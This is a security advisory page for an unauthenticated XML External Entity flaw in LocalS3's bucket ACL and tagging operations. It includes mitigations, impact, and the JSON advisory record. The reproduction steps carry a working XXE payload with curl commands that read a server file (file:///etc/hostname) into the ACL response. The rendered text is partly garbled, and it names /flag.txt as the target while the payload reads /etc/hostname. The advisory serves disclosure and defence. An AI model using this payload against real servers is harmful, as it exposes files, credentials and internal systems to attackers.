GHSA-2466-4485-4PXJ
Vulnerability from github – Published: 2025-03-10 18:29 – Updated: 2025-03-10 18:29Description
The LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server's filesystem.
The vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.
This type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.
Steps to Reproduce
-
Create a test bucket using PUT request to http://[server]/[bucket-name]
curl -X PUT "http://app/xxe-test-bucket2"``` -
Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload: ``` curl -X PUT "http://app/xxe-test-bucket2?acl" \ -H "Content-Type: application/xml" \ -d '
]> &xxe; test test test FULL_CONTROL ' ```
-
Send a GET request to
http://[server]/[bucket-name]?aclto retrieve the bucket ACLcurl "http://app/xxe-test-bucket2?acl"
After performing these steps, the content of the target file (/flag.txt in this case) will be included in the response within the ID field of the Owner element.
Mitigations
- Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true
- Disable DOCTYPE declarations in the XML parser configuration
- Implement XML input validation and sanitization before processing
- Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary
Impact
The vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server's filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.github.robothy:local-s3-rest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.21"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-10T18:29:05Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Description\n\nThe LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server\u0027s filesystem.\n\nThe vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.\n\nThis type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.\n\n## Steps to Reproduce\n\n1. Create a test bucket using PUT request to http://[server]/[bucket-name]\n\n ```\n curl -X PUT \"http://app/xxe-test-bucket2\"```\n ```\n\n2. Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload:\n ```\n curl -X PUT \"http://app/xxe-test-bucket2?acl\" \\\n -H \"Content-Type: application/xml\" \\\n -d \u0027\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n \u003c!DOCTYPE AccessControlPolicy [\n \u003c!ENTITY xxe SYSTEM \"file:///etc/hostname\" \u003e\n ]\u003e\n \u003cAccessControlPolicy\u003e\n \u003cOwner\u003e\n \u003cID\u003e\u0026xxe;\u003c/ID\u003e\n \u003cDisplayName\u003etest\u003c/DisplayName\u003e\n \u003c/Owner\u003e\n \u003cAccessControlList\u003e\n \u003cGrant\u003e\n \u003cGrantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\"\u003e\n \u003cID\u003etest\u003c/ID\u003e\n \u003cDisplayName\u003etest\u003c/DisplayName\u003e\n \u003c/Grantee\u003e\n \u003cPermission\u003eFULL_CONTROL\u003c/Permission\u003e\n \u003c/Grant\u003e\n \u003c/AccessControlList\u003e\n \u003c/AccessControlPolicy\u003e\u0027\n ```\n\n3. Send a GET request to `http://[server]/[bucket-name]?acl` to retrieve the bucket ACL\n\n ```\n curl \"http://app/xxe-test-bucket2?acl\"\n ```\n\nAfter performing these steps, the content of the target file (/flag.txt in this case) will be included in the response within the ID field of the Owner element.\n\n## Mitigations\n\n- Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true\n- Disable DOCTYPE declarations in the XML parser configuration\n- Implement XML input validation and sanitization before processing\n- Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary\n\n## Impact\n\nThe vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server\u0027s filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.",
"id": "GHSA-2466-4485-4pxj",
"modified": "2025-03-10T18:29:05Z",
"published": "2025-03-10T18:29:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Robothy/local-s3/security/advisories/GHSA-2466-4485-4pxj"
},
{
"type": "WEB",
"url": "https://github.com/Robothy/local-s3/commit/d6ed756ceb30c1eb9d4263321ac683d734f8836f"
},
{
"type": "PACKAGE",
"url": "https://github.com/Robothy/local-s3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "LocalS3 Project Bucket Operations Vulnerable to XML External Entity (XXE) Injection"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.